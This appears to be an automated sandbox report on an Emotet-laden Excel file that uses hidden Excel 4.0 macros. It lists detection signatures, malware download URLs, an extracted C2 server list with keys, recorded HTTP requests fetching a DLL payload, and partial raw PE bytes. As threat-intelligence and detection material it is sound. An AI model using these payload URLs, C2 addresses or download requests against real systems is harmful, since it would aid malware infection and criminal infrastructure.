Windows Analysis Report
DOCUMENT_2801.xls

Overview

General Information

Sample Name: DOCUMENT_2801.xls
Analysis ID: 562416
MD5: 3f397d9cca325167d86d575896d40207
SHA1: 54b8106c1715eb58230371fa033cbdec1e3aaeff
SHA256: f695adbe8668cdef7b307bc0fc89a664d8002b42dc91b8a01a75aec4cfc9018c
Tags: SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Passes commands via pipe to a shell (likely to bypass AV or HIPS)
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/PE3 Avira URL Cloud: Label: malware
Source: http://engaz.shop/wp-content/MOllqUm2nb/PE3 Avira URL Cloud: Label: malware
Source: http://engaz.shop/wp-content/MOllqUm2nb/ Avira URL Cloud: Label: malware
Source: https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.172/ee/ss/se.html Avira URL Cloud: Label: malware
Source: http://3-fasen.com/wp-content/3Bl0hBbW/PE3 Avira URL Cloud: Label: malware
Source: https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/ Avira URL Cloud: Label: malware
Source: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK1 Avira URL Cloud: Label: malware
Source: https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/ Avira URL Cloud: Label: malware
Source: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/PE3 Avira URL Cloud: Label: malware
Source: https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/PE3 Avira URL Cloud: Label: malware
Source: http://tunbridgeservices.com/jfoeqhxz/zOX0/PE3 Avira URL Cloud: Label: malware
Source: https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/PE3 Avira URL Cloud: Label: malware
Source: http://tamiladsense.com/wp-inclu Avira URL Cloud: Label: malware
Source: http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/ Avira URL Cloud: Label: malware
Source: http://imaginariumstore.fun/ncsb Avira URL Cloud: Label: malware
Source: https://mypurealsystem.com/App_Start/Rhh8lKO/PE3 Avira URL Cloud: Label: malware
Source: https://ecobaby.pi-dh.com/Serend Avira URL Cloud: Label: malware
Source: http://3-fasen.com/wp-content/3B Avira URL Cloud: Label: malware
Source: http://onexone.elementor.cloud/c Avira URL Cloud: Label: malware
Source: http://3-fasen.com/wp-content/3Bl0hBbW/ Avira URL Cloud: Label: malware
Source: http://engaz.shop/wp-content/MOl Avira URL Cloud: Label: malware
Source: https://mypurealsystem.com/App_Start/Rhh8lKO/ Avira URL Cloud: Label: malware
Source: https://vn.minino.com/wp-admin/c3WQa/PE3 Avira URL Cloud: Label: malware
Source: https://vn.minino.com/wp-admin/c3WQa/ Avira URL Cloud: Label: malware
Source: http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/ Avira URL Cloud: Label: malware
Source: http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/PE3 Avira URL Cloud: Label: malware
Source: http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/ Avira URL Cloud: Label: malware
Source: http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/ Avira URL Cloud: Label: malware
Source: http://tamiladsense.com Avira URL Cloud: Label: malware
Source: http://tunbridgeservices.com/jfoeqhxz/zOX0/ Avira URL Cloud: Label: malware
Source: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/ Avira URL Cloud: Label: malware
Source: http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.172/ee/ss/se.png Avira URL Cloud: Label: malware
Source: http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/PE3 Avira URL Cloud: Label: malware
Source: https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 17.2.rundll32.exe.3090000.27.unpack Malware Configuration Extractor: Emotet {"C2 list": ["74.207.230.120:8080", "139.196.72.155:8080", "37.44.244.177:8080", "37.59.209.141:8080", "116.124.128.206:8080", "217.182.143.207:443", "54.37.228.122:443", "203.153.216.46:443", "168.197.250.14:80", "207.148.81.119:8080", "195.154.146.35:443", "78.46.73.125:443", "191.252.103.16:80", "210.57.209.142:8080", "185.168.130.138:443", "142.4.219.173:8080", "118.98.72.86:443", "78.47.204.80:443", "159.69.237.188:443", "190.90.233.66:443", "104.131.62.48:8080", "62.171.178.147:8080", "185.148.168.15:8080", "54.38.242.185:443", "198.199.98.78:8080", "194.9.172.107:8080", "85.214.67.203:8080", "66.42.57.149:443", "185.148.168.220:8080", "103.41.204.169:8080", "128.199.192.135:8080", "195.77.239.39:8080", "59.148.253.194:443"], "Public Key": ["RUNTMSAAAAD0LxqDNhonUYwk8sqo7IWuUllRdUiUBnACc6romsQoe1YJD7wIe4AheqYofpZFucPDXCZ0z9i+ooUffqeoLZU0", "RUNLMSAAAADYNZPXY4tQxd/N4Wn5sTYAm5tUOxY2ol1ELrI4MNhHNi640vSLasjYTHpFRBoG+o84vtr7AJachCzOHjaAJFCW"]}
Multi AV Scanner detection for submitted file
Source: DOCUMENT_2801.xls ReversingLabs: Detection: 16%
Multi AV Scanner detection for domain / URL
Source: tamiladsense.com Virustotal: Detection: 7% Perma Link
Machine Learning detection for dropped file
Source: C:\ProgramData\Milossd.dll Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 13_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 17_2_0035BAEA FindFirstFileW, 17_2_0035BAEA

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: tamiladsense.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 91.240.118.172:80

Networking
barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.172:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 74.207.230.120 144 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 139.196.72.155 144 Jump to behavior
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 74.207.230.120:8080
Source: Malware configuration extractor IPs: 139.196.72.155:8080
Source: Malware configuration extractor IPs: 37.44.244.177:8080
Source: Malware configuration extractor IPs: 37.59.209.141:8080
Source: Malware configuration extractor IPs: 116.124.128.206:8080
Source: Malware configuration extractor IPs: 217.182.143.207:443
Source: Malware configuration extractor IPs: 54.37.228.122:443
Source: Malware configuration extractor IPs: 203.153.216.46:443
Source: Malware configuration extractor IPs: 168.197.250.14:80
Source: Malware configuration extractor IPs: 207.148.81.119:8080
Source: Malware configuration extractor IPs: 195.154.146.35:443
Source: Malware configuration extractor IPs: 78.46.73.125:443
Source: Malware configuration extractor IPs: 191.252.103.16:80
Source: Malware configuration extractor IPs: 210.57.209.142:8080
Source: Malware configuration extractor IPs: 185.168.130.138:443
Source: Malware configuration extractor IPs: 142.4.219.173:8080
Source: Malware configuration extractor IPs: 118.98.72.86:443
Source: Malware configuration extractor IPs: 78.47.204.80:443
Source: Malware configuration extractor IPs: 159.69.237.188:443
Source: Malware configuration extractor IPs: 190.90.233.66:443
Source: Malware configuration extractor IPs: 104.131.62.48:8080
Source: Malware configuration extractor IPs: 62.171.178.147:8080
Source: Malware configuration extractor IPs: 185.148.168.15:8080
Source: Malware configuration extractor IPs: 54.38.242.185:443
Source: Malware configuration extractor IPs: 198.199.98.78:8080
Source: Malware configuration extractor IPs: 194.9.172.107:8080
Source: Malware configuration extractor IPs: 85.214.67.203:8080
Source: Malware configuration extractor IPs: 66.42.57.149:443
Source: Malware configuration extractor IPs: 185.148.168.220:8080
Source: Malware configuration extractor IPs: 103.41.204.169:8080
Source: Malware configuration extractor IPs: 128.199.192.135:8080
Source: Malware configuration extractor IPs: 195.77.239.39:8080
Source: Malware configuration extractor IPs: 59.148.253.194:443
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /ee/ss/se.png HTTP/1.1Host: 91.240.118.172Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /wp-includes/BEADvqGgemV8SnTX/ HTTP/1.1Host: tamiladsense.comConnection: Keep-Alive
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKConnection: Keep-AliveSet-Cookie: 61f44ecc07555=1643400908; expires=Fri, 28-Jan-2022 20:16:08 GMT; Max-Age=60; path=/Cache-Control: no-cache, must-revalidatePragma: no-cacheLast-Modified: Fri, 28 Jan 2022 20:15:08 GMTExpires: Fri, 28 Jan 2022 20:15:08 GMTContent-Type: application/x-msdownloadContent-Disposition: attachment; filename="XrEtCt.dll"Content-Transfer-Encoding: binaryContent-Length: 557056Date: Fri, 28 Jan 2022 20:15:08 GMTData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 20 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 10 00 00 5d f5 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 76 02 00 00 a0 05 00 00 80 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 76 93 00 00 00 20 08 00 00 a0 00 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /ee/ss/se.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.172Connection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-CHOOPAUS AS-CHOOPAUS
Source: Joe Sandbox View ASN Name: DIGITALOCEAN-ASNUS DIGITALOCEAN-ASNUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 207.148.81.119 207.148.81.119
Source: Joe Sandbox View IP Address: 104.131.62.48 104.131.62.48
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 74.207.230.120:8080
Source: global traffic TCP traffic: 192.168.2.22:49170 -> 139.196.72.155:8080
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 15
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://3-fasen.c
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://3-fasen.com/wp-content/3B
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://3-fasen.com/wp-content/3Bl0hBbW/
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://3-fasen.com/wp-content/3Bl0hBbW/PE3
Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172
Source: DOCUMENT_2801.xls.0.dr String found in binary or memory: http://91.240.118.172/ee/ss/se.html
Source: mshta.exe, 00000006.00000003.415186421.000000000314D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/ee/ss/se.htmlfunction
Source: mshta.exe, 00000006.00000003.414502711.0000000003145000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/ee/ss/se.htmlhttp://91.240.118.172/ee/ss/se.html
Source: mshta.exe, 00000006.00000003.428424323.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.427844761.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.412617394.00000000040DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.433058972.00000000040DC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/ee/ss/se.htmli
Source: mshta.exe, 00000006.00000002.429411187.000000000048E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/ee/ss/se.htmlngs
Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/ee/ss/se.p
Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.670073907.000000001B6A0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/ee/ss/se.png
Source: powershell.exe, 00000008.00000002.668843718.00000000037FF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.172/ee/ss/se.pngPE3
Source: mshta.exe, 00000006.00000003.412876273.000000000053F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.430034442.000000000053F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.428162711.000000000053F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.17f
Source: rundll32.exe, 0000000E.00000002.559655343.000000000032A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.11x
Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://devbhoomigaushala.org/Get
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/PE3
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://engaz.sho
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://engaz.shop/wp-content/MOl
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://engaz.shop/wp-content/MOllqUm2nb/
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://engaz.shop/wp-content/MOllqUm2nb/PE3
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://imaginariumstore.fun/ncsb
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/PE3
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK1
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/PE3
Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: rundll32.exe, 00000011.00000002.663543768.00000000004D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://onexone.e
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://onexone.elementor.cloud/c
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/PE3
Source: rundll32.exe, 00000011.00000002.665515752.00000000038C0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tamiladsense.com
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tamiladsense.com/wp-inclu
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/PE3
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tunbridgeservices.com/jfo
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tunbridgeservices.com/jfoeqhxz/zOX0/
Source: powershell.exe, 00000008.00000002.669044453.0000000003953000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://tunbridgeservices.com/jfoeqhxz/zOX0/PE3
Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: rundll32.exe, 00000011.00000002.663586016.00000000004E9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663566714.00000000004E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000008.00000002.663093888.0000000000277000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: mshta.exe, 00000006.00000003.428385382.000000000405D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.428149840.0000000000530000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.protware.com
Source: rundll32.exe, 00000011.00000002.663342975.000000000047A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://139.196.72.155/
Source: rundll32.exe, 00000011.00000002.663437430.00000000004A4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://139.196.72.155/R
